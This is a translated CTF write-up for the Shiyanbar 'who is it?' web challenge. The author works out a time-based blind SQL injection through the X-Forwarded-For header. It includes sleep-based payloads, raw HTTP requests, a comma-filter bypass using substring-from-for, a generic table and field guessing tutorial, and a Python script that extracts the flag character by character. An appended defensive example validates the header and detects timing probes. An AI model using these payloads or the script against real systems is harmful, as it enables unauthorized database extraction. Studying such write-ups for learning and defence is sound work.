First of all, I admit I looked at what other people had done.
I have no experience: I knew the echo came from the X-Forwarded-For header, but I could not get anywhere with it, so I looked at the demos.
Because this involved writing a script, I am recording the injection process here.
I saw two demos. The most straightforward one was to scan with AWVS and then sweep with Python, since I don't think I have the skill to find the right injection myself. Learn to use the tools first.
Others wrote that they used AWVS, but at first my scans turned up nothing no matter what I did. The simple approach turned out to be this:
That simple. Then I found that injection was possible, and it looks like a time delay. Unfortunately, with no systematic study I did not understand it; that is material to fill in later.
The content given is:
Tests performed:
(select (0) from (Select (Sleep (6)) v)/* ' + (SELECT (0) from (Select (Sleep (6))) v) + ' "+ (select (0) from (Select (Sleep (6))) v) + "* * = 6.053 s
(select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.062 s
(select (0) from (Select (Sleep (3)) v)/* ' + (SELECT (0) from (Select (Sleep (3))) v) + ' "+ (select (0) from (Select (Sleep (3))) v) + "* * = 3.042 s
(select (0) from (Select (Sleep (9)) v)/* ' + (SELECT (0) from (Select (Sleep (9))) v) + ' "+ (select (0) from (Select (Sleep (9))) v) + "* * = 9.033 s
(select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.047 s
(select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.047 s
(select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.046 s
(select (0) from (Select (Sleep (6)) v)/* ' + (SELECT (0) from (Select (Sleep (6))) v) + ' "+ (select (0) from (Select (Sleep (6))) v) + "* * = 6.052 s
(select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.063 s
Original value: 1
Then I tested with the HTTP Editor.
The simplified GET request is:
GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1' + (select 1 from (select sleep(5)) v) + '
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com
This works.
Further changes only need to be made to the sleep(5) part.
Because I happened to see a demo using a CASE statement, I tried this statement on my test machine:
select case when (select length(test) from AAA) then sleep(2) else sleep(0) end
It is valid.
Substituting it into the GET request also works.
Then I thought about the challenge itself. The table field is most likely flag, so I tried to see whether that is so.
The GET request is:
GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1' + (select 1 from (select case when (select length(flag) from flag) > 10 then sleep(2) else sleep(0) end) v) + '
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com
Next comes determining the value, which seems to need a loop to guess it out. The demo covered this, but its author had written the loop himself.
I know that for a table field you only need to guess the length of the data and then each character of it.
So I first searched Baidu for how to guess a field's data length. The content was as follows:
1. Guess the table name:
http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0 // guess whether a table admin exists
2. Guess the field name:
http://xxx.com/test.asp?id=123 and (select count(adminname) from admin)>=0 // whether the admin table has a field AdminName
3. Guess the length of the field:
Take the first record of the admin table and get the length of its AdminName field
http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)>=0
http://xxx.com/test.asp?id=123 and (select top 1 len(adminname) from admin)=7 // field AdminName has length 7
4. Guess the value of the field:
Take the first record of the admin table and guess the value of its AdminName field, character by character up to position 7
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,1,1)) from admin)=97
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,2,1)) from admin)=78
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,3,1)) from admin)=96
......
http://xxx.com/test.asp?id=123 and (select top 1 asc(mid(adminname,7,1)) from admin)=102
First guess the length of the field.
Guessing the field length is quick to do by hand.
Narrowing down with repeated greater-than / less-than tests gives an expected length of 32 characters (the top and len in the reference above don't seem to apply here; the database is not the same, so I used length).
GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1' + (select 1 from (select case when (select length(flag) from flag) = [+] then sleep(1) else sleep(0) end) v) + '
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com
Here is the tool I used: the AWVS HTTP Editor.
Then I continued writing test SQL on my test machine, but first I created a mock table.
I just found that IF should also work without CASE, and it looks clearer:
select if((select length(flag) from flag) = 32, sleep(1), sleep(0));
Unfortunately, when I substituted it into the request the sleep failed. Moving on to how to judge a single character, it should be possible to use
select substring(flag,2,1) from flag, i.e. the SUBSTRING function, which should be the same as mid.
Following convention, the value should be of the form flag{}. Let's try it.
GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1' + (select 1 from (select case when (select substring(flag,1,1) from flag) = 'F' then sleep(1) else sleep(0) end) v) + '
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com
But the time does not seem to be 1 s, so did the guess fail? Thinking back, the IF version also had no effect.
Echo of the IF version:
Your IP is:1 ' + (select 1 from (Select if flag) = 32
It looks like it gets truncated from there.
It seems the comma cannot get through, so this has to be solved first ...
Keep searching for information.
Http://www.91ri.org/12168.html
You have to admire the power of online resources.
Modified request:
GET /web/wonderkun/ HTTP/1.1
X-Forwarded-For: 1' + (select 1 from (select case when (select substring(flag from 1 for 1) from flag) = 'F' then sleep(1) else sleep(0) end) v) + '
Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php
Host: ctf5.shiyanbar.com
Then I tried it, changing the trailing sleep(0) to 5, and it took effect.
Start writing the script.
(First I needed a Python manual with examples.)
I searched for requests to see how GET requests are written and how header information is added.
Because it may need to be called repeatedly, I first wrapped it in a method.
I did not know how to add the {} either, so I looked that up on Baidu too.
Then, for judging the time, it only needs to be taken before and after the request; the whole loop should then be able to handle it.
The following code, with comments, completes this:
# -*- coding: utf-8 -*-
# Python 2 script (print statement, xrange)
import requests
import time

# Define a method that returns the request time difference.
# var is the character to test, num is the position in the flag to guess.
def test(var, num):
    # URL
    url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
    # header info; X-Forwarded-For carries the variable part
    headers = {}
    # X-Forwarded-For: if the character at position num equals var, sleep 5 seconds
    headers['X-Forwarded-For'] = ("1' + (select 1 from (select case when (select substring(flag from "
                                  + str(num) + " for 1) from flag) = '" + str(var)
                                  + "' then sleep(5) else sleep(0) end) v) + '")
    headers['Referer'] = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
    headers['Host'] = 'ctf5.shiyanbar.com'
    # time before execution
    time_start = time.time()
    r = requests.get(url, headers=headers)
    # time after execution
    time_stop = time.time()
    # return the time difference in whole seconds
    return int(time_stop) - int(time_start)

# testchar is the dictionary of characters to try. The leading part of the
# original string was mangled in extraction; letters and digits are assumed
# here, only "_.{}-" survives from the original.
testchar = 'abcdefghijklmnopqrstuvwxyz0123456789_.{}-'
# the length of 32 was found manually; loop over the positions to guess
for x in xrange(1, 33):
    # loop over candidate characters for this single position
    for j in testchar:
        # check whether the delay is at least 5 seconds
        if test(j, x) >= 5:
            # the recovered character
            print str(x) + ':' + str(j)
It is worth noting the xrange(1, 33): I first wrote 32 by mistake and only got 31 values ... Also, this challenge never said the flag was in ctf{} form, which made the pitfall bigger!!
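The root cause on the server side is that the header echoed as "Your IP is" is concatenated into SQL as text. As an added defensive example (not the challenge's or the author's code), the following validates X-Forwarded-For as an IP address before it reaches a parameterized query, and adds a regex check that flags the sleep()/CASE WHEN probes used above when reviewing logged header values. The sample header values and the visits table are constructed for the example.

```python
import ipaddress
import re
import sqlite3

# Constructed sample X-Forwarded-For values: two legitimate ones and two
# with the shape of the timing probes shown in this write-up.
SAMPLE_XFF = [
    "203.0.113.7",
    "203.0.113.7, 198.51.100.2",
    "1' + (select 1 from (select sleep(5)) v) + '",
    "1' + (select 1 from (select case when (select length(flag) from flag) > 10 "
    "then sleep(2) else sleep(0) end) v) + '",
]

# Markers of time-based blind injection across common database engines.
TIMING_PROBE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(|\bcase\s+when\b", re.I)

def client_ip_from_xff(header):
    """Return the left-most X-Forwarded-For entry only if it parses as an IP address.
    Anything else, including the payloads above, yields None and never reaches SQL."""
    first = header.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first))
    except ValueError:
        return None

def looks_like_timing_probe(header):
    """Log-review helper: True when the header value carries a timing-probe marker."""
    return TIMING_PROBE.search(header) is not None

def record_visit(conn, header):
    """Store the visitor IP with a parameterized query; returns the stored IP or None."""
    ip = client_ip_from_xff(header)
    if ip is None:
        return None
    conn.execute("INSERT INTO visits (ip) VALUES (?)", (ip,))
    conn.commit()
    return ip

def demo():
    """Run every sample through validation and detection; returns results and row count."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (ip TEXT)")
    results = [(record_visit(conn, h), looks_like_timing_probe(h)) for h in SAMPLE_XFF]
    stored = conn.execute("SELECT COUNT(*) FROM visits").fetchone()[0]
    return results, stored

if __name__ == "__main__":
    print(demo())
```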
Problem:
http://ctf5.shiyanbar.com/web/wonderkun/index.php
This article is from the "Confused about the direction of the road" blog; please keep this source: http://qidai.blog.51cto.com/6435621/1877775
Shiyanbar CTF record: the "who is it?" challenge procedure